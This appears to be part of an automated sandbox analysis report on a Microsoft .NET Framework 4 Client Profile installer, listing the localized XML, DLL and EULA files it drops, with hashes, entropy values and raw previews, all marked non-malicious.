                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.a...n... .p.r.o.g.r.a.m. .n.e.l.z.e. .s.p.u.s.t.i.t. .v. .r.e.~.i.m.u. .k.o.m.p.a.t.i.b.i.l.i.t.y... .D.a.l.a... .i.n.f.o.r.m.a.c.e. .n.a.l.e.z.n.e.t.e. .v. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.s.o.u.b.o.r.u. .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1029\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.308536555634371
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:sIr67PAteQx2PoipahxPh1KuMWp1eWCLXci2jpvsH:sv6CMi2jpvsH
                                                                                                                                                                  MD5:62876C2FE28B1B5C434B9FAD80ABE9F9
                                                                                                                                                                  SHA1:BE3D479204B8E36933E0EECC250C330E69A06D02
                                                                                                                                                                  SHA-256:36E316718C8BBBD7B511E9074FC0EECB9ACD0A9B572F593A5A569CC93276D932
                                                                                                                                                                  SHA-512:FFDD2D8DB4AE62EA07178677D8C8745CF54D7EDBE1683478A2C588D5B84EF9EA970E2B1C44E3B8F18B33D189655B0C42D5747392DB97176A38FAB4CBAB3E3F10
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......V.....@.......................................... ..d(...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1029\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1250, default language ID 1029
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3726
                                                                                                                                                                  Entropy (8bit):5.271587861695615
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:4BfgejTQpTfD/g7OyGBB2nZsEAVxfw8EMpDRI/YFkvvApzdYPBGx2:sfN7OHn2nZsEmf+Oa/c2
                                                                                                                                                                  MD5:B02C48825414EDCA106C92182D32BC8A
                                                                                                                                                                  SHA1:CF00219D69E3CFF9777BABECE1EE9D8CDC776AC9
                                                                                                                                                                  SHA-256:C6147000FC34894C724C09CB69FFCE75DD1263B69D063F75466D70B67B3C80DD
                                                                                                                                                                  SHA-512:B8AFE051701189F60789D0340FD15E81491456284305B55C4582D0153A2C8CB25F1EDD05F40B50893C7CBB80EC57FF635D764DB5F56AA2E945CF29E9C550E9BA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1250\deff0\deflang1029\deflangfe1029{\fonttbl{\f0\fswiss\fprq2\fcharset238 Tahoma;}{\f1\froman\fprq2\fcharset238{\*\fname Times New Roman;}Times New Roman CE;}{\f2\fswiss\fprq2\fcharset238 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs20 DODATKOV\'c9 LICEN\'c8N\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\'c8NOSTI MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1029\f0 MICROSOFT .NET FRAMEWORK 4 PRO OPERA\'c8N\'cd SYST\'c9M MICROSOFT WINDOWS\lang1033\f1\par..\lang1029\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PRO OPERA\'c8N\'cd SYST\'c9M MICROSOFT WINDOWS\par..\pard\brdrb\brdrs\brdrw10\brsp20 A P\'d8IDRU\'8eEN\'c9 JAZYKOV\'c9 SADY\par..\pard\nowidctlpar\sb120\sa120\b0 Licenci k\~tomuto dodatku v\'e1m poskytuje spole\'e8nost Microsoft Corporation (nebo n\'eckter\'e1 z\~jej\'edch afilac\'ed v\~z\'e1vislosti na tom, kde bydl\'edte).\lang1033\b

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1030\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (700), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):77748
                                                                                                                                                                  Entropy (8bit):3.5770566057374418
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wvo3sGYQTjtLCpCggWuUyl+JMcf/zmSmRLAgRQJmS+e/JAu1O2Xx+v:9o8GYQTjtLCYggWuUMe+e/J8
                                                                                                                                                                  MD5:69925E463A6FEDCE8C8E1B68404502FB
                                                                                                                                                                  SHA1:76341E490A432A636ED721F0C964FD9026773DD7
                                                                                                                                                                  SHA-256:5F370D2CCDD5FA316BCE095BF22670123C09DE175B7801D0A77CDB68174AC6B7
                                                                                                                                                                  SHA-512:5F61ABEC49E1F9CC44C26B83AA5B32C217EBEBA63ED90D25836F51F810C59F71EC7430DC5338EFBA9BE720F800204891E5AB9A5F5EC1FF51EF46C629482E5220
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.l.a.t.i.o.n.s.p.r.o.g.r.a.m.m.e.t. .k.a.n. .i.k.k.e. .k...r.e. .i. .k.o.m.p.a.t.i.b.i.l.i.t.e.t.s.t.i.l.s.t.a.n.d... .D.u. .k.a.n. .f.i.n.d.e. .f.l.e.r.e. .o.p.l.y.s.n.i.n.g.e.r. .i. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.V.i.g.t.i.g.t.-.f.i.l.e.n.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1030\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.237828095883879
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:cNX61hALPTIOWWptfeWuLXci2jXHUgyh1J:cQweMi2jXHUgU1J
                                                                                                                                                                  MD5:9F0CD8981979154CC2A6393DA42731C5
                                                                                                                                                                  SHA1:AFFAFE8CF152C25DF75CF3E6B67B7AA8A4A80056
                                                                                                                                                                  SHA-256:30C86AE90DE0EE7D2A637AB7EF7AE450690A55A5EA8C007169BAB57B10F0E013
                                                                                                                                                                  SHA-512:036253A9B4718EC38C7784ABA6AA124E4A334170AD13546126B0D746F003A4FC571165DBDA3BC3DD1911C343326CAE22C0A3C0A82A17D7F5943D2F2057E3C060
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......9a....@.......................................... ..$(...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1030\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3314
                                                                                                                                                                  Entropy (8bit):5.229229499381171
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:MTBfIGPzxT1B9TwDXOC1uJzGTcDC5bhPqljShnEGiBe4YOMpDIbu0L9D+Ogp+Ogj:If/Jqn1uJzGTcDC5bhSljShnEGioDOOa
                                                                                                                                                                  MD5:B756C9B475E1E5955D8BF1544DF556F7
                                                                                                                                                                  SHA1:03ACD306196D5C0CDFBEB947CE3E018C08FD08CB
                                                                                                                                                                  SHA-256:204021CC428C70F76DE750C0B01404E3396EE8602C8F25F44635F6F2BDBF693A
                                                                                                                                                                  SHA-512:88E44178770025B960BF2329901B6BEC90115B62D9F44A43FD914AEF687C2FCE7E370D9BA8CAAF9BF930553EB99580C47F8E7FDC0C32FE9A921DD368BF8E4658
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1030\b\f0\fs28 TILL\'c6G TIL LICENSVILK\'c5R FOR MICROSOFT-SOFTWARE\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1030\f0\fs22 MICROSOFT .NET FRAMEWORK 4 TIL MICROSOFT WINDOWS-OPERATIVSYSTEM\lang1033\par..\lang1030 MICROSOFT .NET FRAMEWORK 4-KLIENTPROFIL TIL MICROSOFT WINDOWS-OPERATIVSYSTEM\par..OG TILKNYTTEDE SPROGPAKKER\lang1033\f1\fs20\par..\pard\nowidctlpar\sb120\sa120\lang1030\b0\f0 Microsoft Corporation (eller, afh\'e6ngigt af hvor De bor, et af dets associerede selskaber) licenserer dette till\'e6g til Dem.\lang1033\b \lang1030\b0 Hvis De har licens til at bruge Microsoft Windows-operativsystemsoftware (som dette till\'e6g g\'e6lder for) ("

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1031\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (682), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):82346
                                                                                                                                                                  Entropy (8bit):3.5798945100215325
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:guayUbZwf+2CzQHsjz1VbxzPGnz6solo8xKc6JT/1Sy:JayUtwf+2CzQHshPGnz6solo8xKc6JTd
                                                                                                                                                                  MD5:8505219C0A8D950FF07DC699D8208309
                                                                                                                                                                  SHA1:7A557356C57F1FA6D689EA4C411E727438AC46DF
                                                                                                                                                                  SHA-256:C48986CDB7FE3401234E0A6540EB394C1201846B5BEB1F12F83DC6E14674873A
                                                                                                                                                                  SHA-512:7BCDAD0CB4B478068434F4EBD554474B69562DC83DF9A423B54C1701CA3B43C3B92DE09EE195A86C0D244AA5EF96C77B1A08E73F1F2918C8AC7019F8DF27B419
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".D.a.s. .S.e.t.u.p. .k.a.n.n. .n.i.c.h.t. .i.m. .K.o.m.p.a.t.i.b.i.l.i.t...t.s.m.o.d.u.s. .a.u.s.g.e.f...h.r.t. .w.e.r.d.e.n... .W.e.i.t.e.r.e. .I.n.f.o.r.m.a.t.i.o.n.e.n. .f.i.n.d.e.n. .S.i.e. .i.n. .d.e.r. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.I.n.f.o.d.a.t.e.i.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1031\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18776
                                                                                                                                                                  Entropy (8bit):5.135663555520085
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:lQ16m3rhGrcHN/USYvYVA9WKieW8bLXci2jXHU2Ze:lEhCSVYvYVAA+Mi2jXHU2A
                                                                                                                                                                  MD5:7C9AE49B3A400C728A55DD1CACC8FFB2
                                                                                                                                                                  SHA1:DD3A370F541010AD650F4F6AA42E0CFC68A00E66
                                                                                                                                                                  SHA-256:402C796FEBCD78ACE8F1C5975E39193CFF77F891CFF4D32F463F9A9C83806D4A
                                                                                                                                                                  SHA-512:D30FE9F78A49C533BE5C00D88B8C2E66A8DFAC6D1EAE94A230CD937F0893F6D4A0EECE59C1D2C3C8126FFA9A9648EC55A94E248CD8C7F9677F45C231F84F221B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P.......D....@.......................................... ..`+...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1031\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3419
                                                                                                                                                                  Entropy (8bit):5.19064562442276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:MWBfVBITvyTqDyiRc3E5Zob0MpDmqgH4KYXsY/49Uo2:VffWX5Zm0O3Q32
                                                                                                                                                                  MD5:94190970FB79C7085DE2E97AE4630B07
                                                                                                                                                                  SHA1:272677F49985098CA0477D6A8C1E70E4BDDB646C
                                                                                                                                                                  SHA-256:A448FE5954EC68B7C395DA387545C1664C3F4BAADE021E6157EC142997D93CA2
                                                                                                                                                                  SHA-512:7A7EE485D20912FC533E83EAE0F151DC142C2F01051735D1F9B20A7146154A04C8269FC9F71AC82E57925B566E07E716CDED6DB8B11026225CEAAC209311531F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1031\b\f0\fs20 ERG\'c4NZENDE LIZENZBESTIMMUNGEN F\'dcR MICROSOFT-SOFTWARE\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 F\'dcR MICROSOFT WINDOWS-BETRIEBSSYSTEM\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE F\'dcR MICROSOFT WINDOWS-BETRIEBSSYSTEM\par..UND ZUGEH\'d6RIGE LANGUAGE PACKS\f1\par..\pard\nowidctlpar\sb120\sa120\b0\f0 Microsoft Corporation (oder eine andere Microsoft-Konzerngesellschaft, wenn diese an dem Ort, an dem Sie leben, die Software lizenziert) lizenziert diese Softwareerg\'e4nzung an Sie. Wenn Sie \'fcber eine Lizenz f\'fcr Microsoft Windows-Betriebssystem-Software verf\'fcgen (f\'fcr die diese Softwareerg\

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1032\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (708), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):86284
                                                                                                                                                                  Entropy (8bit):4.3740758325121645
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4w+7UVysuXHXeXAehlT++sTGoheXrW4MgcyvF773/xSFVQbleaS8tOnjiJLtchH0:+3OQeHll5PunjiJr
                                                                                                                                                                  MD5:3BF8DA35B14FBCC564E03F6342BB71F2
                                                                                                                                                                  SHA1:8F9139F0BB813BF95F8C437548738D32848D8940
                                                                                                                                                                  SHA-256:39EFE12C689EDFEA041613B0E4D6EC78AFEC8FE38A0E4ADC656591FFEF8F415D
                                                                                                                                                                  SHA-512:31B050647BA4BD0C2762D77307E1ED2A324E9B152C06ED496B86EA063CDC18BF2BB1F08D2E9B4AF3429A2BC333D7891338D7535487C83495304A5F78776DBC03
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."....... ........... ............. ... ................. ....... ......................... ..... ................... ....................... ........................... ....... ......................... .......................,. ................... ....... .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;............. .r.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1032\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):19288
                                                                                                                                                                  Entropy (8bit):5.607263971475317
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:jwB6VfhGGglsETXrI7k1tcVlUHe3YRPWTBZWwLXci2jXHUQ:jlpGGKQVlhsSLMi2jXHUQ
                                                                                                                                                                  MD5:E663B67A66ADF9375D1D183CA5FDD23D
                                                                                                                                                                  SHA1:30360546A00FFF0A7C2B47F4B01C89E771F13971
                                                                                                                                                                  SHA-256:574FBDEDCDA1F9F34C997AC3F192CBA72A67D6534B2E9AB80A35AB3543621D58
                                                                                                                                                                  SHA-512:46E7FFB4889A43059665893ABF1D2B6BF3430A617023FFA91F54AF6D5062444B844D8811ED2D037E756993F733986479E93784AC25C553F70F1CF8D1B67182A3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........0...............................................P............@.......................................... ..`-...........4..X............................................................................................text...G...........................@..@.rsrc....0... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1032\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8876
                                                                                                                                                                  Entropy (8bit):4.086204739568071
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:/foOHY6P6Km5NHMQaEjxPSuHON0SuQI62:R46Pm5Ns0jxpeuQV2
                                                                                                                                                                  MD5:2091F5DA2BF884F747103A31D2DC947B
                                                                                                                                                                  SHA1:AAD26EB74B793D7DE2F466150F609C276D398FB5
                                                                                                                                                                  SHA-256:B7A7F2388600D9D059DCDF300845938E429A0FF16EB03BDECE48825805069B7E
                                                                                                                                                                  SHA-512:AE798ACD11E9A4ADD33DA760B46200E24B9F9403BBBFAF6CB45E25193D346BDE3B91C9B79BB7E10E529DEDD824A89D23212745CF9E9E5EBB44319E9DD812C61D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset161 Tahoma;}{\f1\froman\fprq2\fcharset161{\*\fname Times New Roman;}Times New Roman Greek;}{\f2\fswiss\fprq2\fcharset161 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1032\b\f0\fs20\'d3\'d5\'cc\'d0\'cb\'c7\'d1\'d9\'cc\'c1\'d4\'c9\'ca\'cf\'c9 \'cf\'d1\'cf\'c9 \'c1\'c4\'c5\'c9\'c1\'d3 \'d7\'d1\'c7\'d3\'c7\'d3 \'cb\'cf\'c3\'c9\'d3\'cc\'c9\'ca\'cf\'d5 \'d4\'c7\'d3 MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1032\f0 MICROSOFT .NET FRAMEWORK 4 \'c3\'c9\'c1 \'cb\'c5\'c9\'d4\'cf\'d5\'d1\'c3\'c9\'ca\'cf \'d3\'d5\'d3\'d4\'c7\'cc\'c1 MICROSOFT WINDOWS\lang1033\f1\par..\lang1032\f0\'d0\'d1\'cf\'d6\'c9\'cb \'d0\'d1\'cf\'c3\'d1\'c1\'cc\'cc\'c1\'d4\'cf\'d3-\'d0\'c5\'cb\'c1\'d4\'c7 MICROSOFT .NET FRAMEWORK 4 \'c3\'c9\'c1 \'cb\'c5\'c9\'d4\'cf\'d5\'d1\'c3\'c9\'ca\'cf \'d3\'d5\'d3\

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1033\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (657), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):77232
                                                                                                                                                                  Entropy (8bit):3.5669629909438734
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4w6JjgKW5D8U2JhrDheHQTBNgNSdfUGNatvcc7QDBuGdSJgkR6Sqzxu:gJsKKIrDPT7lSJYI
                                                                                                                                                                  MD5:326518603D85ACD79A6258886FC85456
                                                                                                                                                                  SHA1:F1CEF14BC4671A132225D22A1385936AD9505348
                                                                                                                                                                  SHA-256:665797C7840B86379019E5A46227F888FA1A36A593EA41F9170EF018C337B577
                                                                                                                                                                  SHA-512:F8A514EFD70E81D0F2F983282D69040BCA6E42F29AA5DF554E6874922A61F112E311AD5D2B719B6CA90012F69965447FB91E8CD4103EFB2453FF160A9062E5D3
                                                                                                                                                                  Malicious:false
